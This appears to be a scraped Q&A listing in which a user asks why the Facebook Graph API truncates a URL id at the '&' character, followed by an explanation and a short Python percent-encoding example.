    I get an empty document returned. Any ideas why this is?

    Read the article

  • Illegal characters in the Facebook Graph API

    - by user1465888
    I was trying to find out how many Facebook likes a URL has through the Facebook Graph API. To get the likes I need to fetch the content of this URL:

        http://graph.facebook.com/?id=URL

    For example, try going to "graph.facebook.com/?id=http://stackoverflow.com" and you will see how many "shares" the URL got (shares is the sum of shares and likes), so everything was working fine when I tried this. The problem starts when I use special characters: when I use the "?" character everything works, but when I use the "&" character the URL gets cut off. Try this: "graph.facebook.com/?id=http://stackoverflow.com?p=blabla&a=fsdf". You can see on that page that the id actually gets cut at the "&" character, and the response ends up like this:

        { "id": "http://stackoverflow.com?p=blabla" }

    Sorry for my bad English.
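    This is what one would expect when the target URL is dropped into the query string unescaped, because "&" starts a new query parameter; percent-encoding the id value first keeps the whole target inside one parameter. A Python sketch of the encoding step (for illustration only):

        from urllib.parse import quote

        target = "http://stackoverflow.com?p=blabla&a=fsdf"     # the URL whose likes we want
        # Encode it so "&", "?" and "=" inside it don't terminate the id parameter.
        graph_url = "http://graph.facebook.com/?id=" + quote(target, safe="")
        print(graph_url)
        # http://graph.facebook.com/?id=http%3A%2F%2Fstackoverflow.com%3Fp%3Dblabla%26a%3Dfsdf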

    Read the article
